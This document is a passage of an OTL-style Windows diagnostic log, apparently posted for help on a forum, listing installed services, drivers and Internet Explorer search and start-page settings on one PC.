SRV:[b]64bit:[/b] - [2014/10/29 09:57:18 | 000,074,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:[b]64bit:[/b] - [2014/10/29 09:48:52 | 000,562,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:[b]64bit:[/b] - [2014/10/29 09:46:48 | 001,348,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:35:51 | 001,668,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:[b]64bit:[/b] - [2014/10/01 19:54:24 | 000,319,376 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Windows\SysNative\igfxCUIService.exe -- (igfxCUIService1.0.0.0)
SRV:[b]64bit:[/b] - [2012/08/14 18:03:42 | 000,027,792 | ---- | M] (VIA Technologies, Inc.) [Auto | Stopped] -- C:\Windows\SysNative\ViakaraokeSrv.exe -- (VIAKaraokeService)
SRV:[b]64bit:[/b] - [2012/06/19 19:10:34 | 000,634,632 | ---- | M] (Intel(R) Corporation) [Auto | Stopped] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV - [2015/04/15 01:48:07 | 000,268,464 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/04/03 14:37:50 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/02/18 19:11:32 | 000,315,488 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 15:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2014/10/29 10:51:55 | 000,017,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2014/10/29 10:04:45 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2014/10/29 09:53:11 | 000,367,104 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2014/10/01 19:54:28 | 000,281,488 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2014/08/14 07:30:50 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/03/04 10:10:14 | 000,122,464 | ---- | M] (株式会社ネットビジョン) [On_Demand | Stopped] -- C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe -- (auWifiConnectSvc)
SRV - [2013/12/18 01:56:16 | 000,754,712 | ---- | M] (Google Inc.) [Auto | Stopped] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2012/09/17 17:19:50 | 000,364,416 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/09/17 17:19:48 | 000,276,864 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/09/17 17:19:34 | 000,165,760 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2007/09/05 14:38:28 | 000,174,624 | ---- | M] () [Auto | Stopped] -- C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe -- (TangoCoreService)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/03/04 19:25:11 | 000,377,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,264,000 | ---- | M] (Microsoft Corporation) [File_System | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,114,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:04 | 000,044,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:[b]64bit:[/b] - [2014/12/12 09:51:20 | 000,075,776 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:[b]64bit:[/b] - [2014/11/13 21:35:31 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:47 | 000,415,040 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:12 | 000,136,512 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:[b]64bit:[/b] - [2014/10/29 12:57:42 | 000,054,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:[b]64bit:[/b] - [2014/10/29 12:56:04 | 000,027,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:43 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:41 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:09 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:54 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:39 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:16 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:[b]64bit:[/b] - [2014/10/15 17:32:36 | 000,921,920 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,238,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,086,336 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,039,744 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:[b]64bit:[/b] - [2014/10/08 18:24:09 | 000,467,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,324,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,189,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:[b]64bit:[/b] - [2014/10/07 15:44:39 | 000,069,952 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:[b]64bit:[/b] - [2014/10/01 19:54:16 | 003,828,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2014/09/24 16:27:11 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:[b]64bit:[/b] - [2014/09/24 15:58:01 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:48 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:[b]64bit:[/b] - [2014/09/24 15:29:18 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:[b]64bit:[/b] - [2014/08/15 09:36:55 | 000,146,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,038,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,027,032 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2013/08/22 21:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:[b]64bit:[/b] - [2013/08/22 21:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:[b]64bit:[/b] - [2013/08/22 20:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:[b]64bit:[/b] - [2013/08/22 17:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:[b]64bit:[/b] - [2013/08/13 08:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:[b]64bit:[/b] - [2013/08/10 09:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:[b]64bit:[/b] - [2013/08/06 15:13:30 | 000,023,040 | ---- | M] (Apple Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netaapl64.sys -- (Netaapl)
DRV:[b]64bit:[/b] - [2013/07/31 03:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:[b]64bit:[/b] - [2013/07/26 04:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:[b]64bit:[/b] - [2013/06/18 23:44:59 | 000,129,224 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\L1C63x64.sys -- (L1C)
DRV:[b]64bit:[/b] - [2013/04/04 14:50:32 | 000,025,928 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:[b]64bit:[/b] - [2012/09/01 18:01:56 | 000,647,736 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/08/14 18:03:34 | 002,206,352 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\viahduaa.sys -- (VIAHdAudAddService)
DRV:[b]64bit:[/b] - [2012/07/02 15:16:02 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/19 07:40:50 | 000,342,528 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2010/08/11 23:51:48 | 001,587,968 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ksaud.sys -- (ksaud)
DRV:[b]64bit:[/b] - [2010/07/05 13:47:00 | 000,565,248 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GVUSB2.X64.SYS -- (GVUSB2.X64)
DRV - [2012/07/05 10:46:18 | 000,125,544 | ---- | M] () [Kernel | System | Stopped] -- C:\ProgramData\Kingsoft\klive\bin\encrypteddisk-x64.sys -- (EncryptedDisk)
DRV - [2007/07/06 15:34:36 | 000,016,800 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\RAWESR.sys -- (RAWESR)
DRV - [2007/07/06 15:34:34 | 000,013,600 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\LOGNT.SYS -- (LOGNT)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\NTSTPL2.SYS -- (NTSTPL2)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\ntstpl1.sys -- (NTSTPL1)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OCustomizeSearch =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OSearchAssistant =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant =
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{726DA24E-A4A1-62E5-72EA-44C7886452CB}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages =
